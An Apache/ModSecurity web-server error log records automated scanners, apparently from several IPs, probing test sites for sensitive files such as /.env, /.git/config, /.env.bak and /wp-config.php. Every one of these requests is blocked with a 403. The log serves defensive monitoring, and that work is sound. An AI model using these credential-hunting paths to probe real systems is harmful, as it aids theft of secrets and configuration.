[Thu Nov 13 20:53:32.366191 2025] [:error] [pid 38000] [client 45.139.104.183:34354] [client 45.139.104.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRY3PPqX-Qa3_8pftNO2EwAAAA4"]
[Thu Nov 13 20:53:32.366389 2025] [:error] [pid 38000] [client 45.139.104.183:34354] [client 45.139.104.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRY3PPqX-Qa3_8pftNO2EwAAAA4"]
[Fri Nov 14 02:48:54.962677 2025] [:error] [pid 48964] [client 2.57.122.173:49508] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRaKhj7ESZS2dZ_aApPR0AAAAAM"]
[Fri Nov 14 02:48:54.962961 2025] [:error] [pid 48964] [client 2.57.122.173:49508] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRaKhj7ESZS2dZ_aApPR0AAAAAM"]
[Fri Nov 14 02:48:54.963117 2025] [:error] [pid 48964] [client 2.57.122.173:49508] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRaKhj7ESZS2dZ_aApPR0AAAAAM"]
[Fri Nov 14 06:34:52.133437 2025] [authz_core:error] [pid 53003] [client 139.59.143.102:42342] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 14 06:34:53.269675 2025] [:error] [pid 56424] [client 139.59.143.102:42386] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRa_fRCrsKCGSx4vtHqoKAAAAAE"]
[Fri Nov 14 06:34:53.269915 2025] [:error] [pid 56424] [client 139.59.143.102:42386] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRa_fRCrsKCGSx4vtHqoKAAAAAE"]
[Fri Nov 14 06:34:53.270081 2025] [:error] [pid 56424] [client 139.59.143.102:42386] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRa_fRCrsKCGSx4vtHqoKAAAAAE"]
[Fri Nov 14 06:34:53.443628 2025] [:error] [pid 51834] [client 139.59.143.102:42392] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRa_fXOVIAryQ9tN7lWCswAAAAo"]
[Fri Nov 14 06:34:53.443860 2025] [:error] [pid 51834] [client 139.59.143.102:42392] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRa_fXOVIAryQ9tN7lWCswAAAAo"]
[Fri Nov 14 06:34:53.444008 2025] [:error] [pid 51834] [client 139.59.143.102:42392] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRa_fXOVIAryQ9tN7lWCswAAAAo"]
[Fri Nov 14 06:34:53.573515 2025] [:error] [pid 51748] [client 139.59.143.102:42394] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRa_fSrix95O8c6mmxQ_FAAAAAI"]
[Fri Nov 14 06:34:53.573770 2025] [:error] [pid 51748] [client 139.59.143.102:42394] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRa_fSrix95O8c6mmxQ_FAAAAAI"]
[Fri Nov 14 06:34:53.573926 2025] [:error] [pid 51748] [client 139.59.143.102:42394] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRa_fSrix95O8c6mmxQ_FAAAAAI"]
[Fri Nov 14 08:21:01.535164 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRbYXYFul5RAtD2RIn8lpAAAAAk"]
[Fri Nov 14 08:21:01.538749 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRbYXYFul5RAtD2RIn8lpAAAAAk"]
[Fri Nov 14 08:21:01.538925 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRbYXYFul5RAtD2RIn8lpAAAAAk"]
[Fri Nov 14 08:21:01.956013 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbYXYFul5RAtD2RIn8lpQAAAAk"]
[Fri Nov 14 08:21:01.959850 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbYXYFul5RAtD2RIn8lpQAAAAk"]
[Fri Nov 14 08:21:01.960047 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbYXYFul5RAtD2RIn8lpQAAAAk"]
[Fri Nov 14 08:21:02.395802 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRbYXoFul5RAtD2RIn8lpgAAAAk"]
[Fri Nov 14 08:21:02.399429 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRbYXoFul5RAtD2RIn8lpgAAAAk"]
[Fri Nov 14 08:21:02.399616 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRbYXoFul5RAtD2RIn8lpgAAAAk"]
[Fri Nov 14 08:21:02.837503 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRbYXoFul5RAtD2RIn8lpwAAAAk"]
[Fri Nov 14 08:21:02.841154 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRbYXoFul5RAtD2RIn8lpwAAAAk"]
[Fri Nov 14 08:21:02.841333 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRbYXoFul5RAtD2RIn8lpwAAAAk"]
[Fri Nov 14 08:21:03.183481 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRbYX4Ful5RAtD2RIn8lqAAAAAk"]
[Fri Nov 14 08:21:03.187108 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRbYX4Ful5RAtD2RIn8lqAAAAAk"]
[Fri Nov 14 08:21:03.187303 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRbYX4Ful5RAtD2RIn8lqAAAAAk"]
[Fri Nov 14 08:21:03.515698 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRbYX4Ful5RAtD2RIn8lqQAAAAk"]
[Fri Nov 14 08:21:03.516204 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRbYX4Ful5RAtD2RIn8lqQAAAAk"]
[Fri Nov 14 08:21:03.519945 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRbYX4Ful5RAtD2RIn8lqQAAAAk"]
[Fri Nov 14 08:21:03.520127 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRbYX4Ful5RAtD2RIn8lqQAAAAk"]
[Fri Nov 14 08:21:03.756975 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRbYX4Ful5RAtD2RIn8lqgAAAAk"]
[Fri Nov 14 08:21:03.760770 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRbYX4Ful5RAtD2RIn8lqgAAAAk"]
[Fri Nov 14 08:21:03.760956 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRbYX4Ful5RAtD2RIn8lqgAAAAk"]
[Fri Nov 14 08:21:04.050916 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRbYYIFul5RAtD2RIn8lqwAAAAk"]
[Fri Nov 14 08:21:04.054578 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRbYYIFul5RAtD2RIn8lqwAAAAk"]
[Fri Nov 14 08:21:04.054773 2025] [:error] [pid 51833] [client 195.178.110.201:44910] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRbYYIFul5RAtD2RIn8lqwAAAAk"]
